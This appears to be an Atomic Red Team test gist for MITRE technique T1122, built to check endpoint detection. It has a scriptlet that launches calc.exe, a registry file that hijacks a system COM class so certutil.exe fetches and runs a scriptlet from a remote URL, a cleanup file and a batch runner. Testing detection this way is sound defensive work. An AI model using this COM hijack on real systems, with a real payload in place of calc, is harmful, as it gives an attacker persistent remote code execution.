totoroha/AtomicRedTeam.sct

## _Instructions_.MD

      
    Raw
  

              _Instructions_.MD
            
          
    Sample of how the test scripts will work for ATOMIC Red Team Repo

First - Read and Understand the Attack on the MITRE ATT&CK PAGE
T1122
Confirm Endpoint Collection is Active
Execute test.bat
Expected Result - Execution Of Calc.exe From URL
Confirm Results


## AtomicRedTeam.sct
<?XML version="1.0"?>
<scriptlet>

<registration
    description="AtomicRedTeam"
    progid="AtomicRedTeam"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
    remotable="true"
	>
</registration>

<script language="JScript">
<![CDATA[

		var r = new ActiveXObject("WScript.Shell").Run("calc.exe");


]]>
</script>

</scriptlet>

## COMHijack.reg
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32]
@="C:\\WINDOWS\\system32\\scrobj.dll"
"ThreadingModel"="Apartment"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID]
@="AtomicRedTeam.1.00"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL]
@="https://gist.githubusercontent.com/subTee/91861699acaa1bd0da493c8a79035eb9/raw/bb38d92a543084207e0f14a1f2c4dde15db84659/AtomicRedTeam.sct"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}]
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}\TreatAs]
@="{00000001-0000-0000-0000-0000FEEDACDC}"

## COMHijackCleanup.reg
Windows Registry Editor Version 5.00
[-HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00]
[-HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam]
[-HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
[-HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}]

## test.bat
reg import COMHijack.reg
certutil.exe -CAInfo
reg import COMHijackCleanup.reg
	<?XML version="1.0"?>
	<scriptlet>

	<registration
	description="AtomicRedTeam"
	progid="AtomicRedTeam"
	version="1.00"
	classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
	remotable="true"
	>
	</registration>

	<script language="JScript">
	<![CDATA[

	var r = new ActiveXObject("WScript.Shell").Run("calc.exe");


	]]>
	</script>

	</scriptlet>
	Windows Registry Editor Version 5.00
	[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00]
	@="AtomicRedTeam"
	[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID]
	@="{00000001-0000-0000-0000-0000FEEDACDC}"
	[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam]
	@="AtomicRedTeam"
	[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID]
	@="{00000001-0000-0000-0000-0000FEEDACDC}"
	[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
	@="AtomicRedTeam"
	[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32]
	@="C:\\WINDOWS\\system32\\scrobj.dll"
	"ThreadingModel"="Apartment"
	[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID]
	@="AtomicRedTeam.1.00"
	[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL]
	@="https://gist.githubusercontent.com/subTee/91861699acaa1bd0da493c8a79035eb9/raw/bb38d92a543084207e0f14a1f2c4dde15db84659/AtomicRedTeam.sct"
	[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID]
	@="AtomicRedTeam"
	[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}]
	[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}\TreatAs]
	@="{00000001-0000-0000-0000-0000FEEDACDC}"
	Windows Registry Editor Version 5.00
	[-HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00]
	[-HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam]
	[-HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
	[-HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}]
	reg import COMHijack.reg
	certutil.exe -CAInfo
	reg import COMHijackCleanup.reg